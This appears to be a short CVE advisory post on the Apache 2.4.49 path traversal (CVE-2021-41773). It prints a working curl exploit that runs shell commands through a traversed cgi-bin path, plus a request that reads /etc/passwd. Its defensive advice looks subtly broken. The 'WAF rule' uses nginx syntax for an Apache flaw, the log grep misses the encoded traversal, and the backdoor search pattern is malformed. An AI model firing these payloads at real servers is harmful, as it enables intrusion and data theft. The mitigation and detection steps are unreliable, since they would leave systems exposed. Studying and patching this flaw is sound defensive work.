Listen to this Post
How CVE-2021-41773 Works:
This vulnerability affects Apache HTTP Server 2.4.49 and allows attackers to exploit a path traversal flaw in the URL normalization process. A misconfigured `require all granted` directive in `.htaccess` enables unauthorized access to files outside the document root. If mod_cgi is enabled, attackers can execute arbitrary commands by sending crafted requests. The flaw arises due to insufficient input validation, permitting `%2e` (URL-encoded dot) to bypass security checks and access restricted directories.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
curl -v "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d "echo;id"
Proof of Concept (PoC):
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: vulnerable-server
Mitigation:
1. Patch Immediately: Upgrade to Apache 2.4.50+.
2. Disable mod_cgi if unused:
LoadModule cgi_module modules/mod_cgi.so Comment this line
3. Restrict Directory Permissions:
<Directory "/var/www/html"> Require all denied </Directory>
Detection (Log Analysis):
grep -r "../" /var/log/apache2/access.log
Exploit Deep Dive:
- Attackers chain path traversal (
%2e%2e/) with CGI scripts to execute OS commands. - Works only if `Options +ExecCGI` is enabled.
Protection Script (WAF Rule):
location ~ "../" {
deny all;
return 403;
}
References:
Impact:
- Unauthenticated RCE → Full server compromise.
- Data exfiltration via
/etc/shadow, SSH keys, etc.
Post-Exploit Forensics:
Check for backdoors: find / -name ".php" -mtime -1 netstat -tulnp | grep -v "127.0.0.1"
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
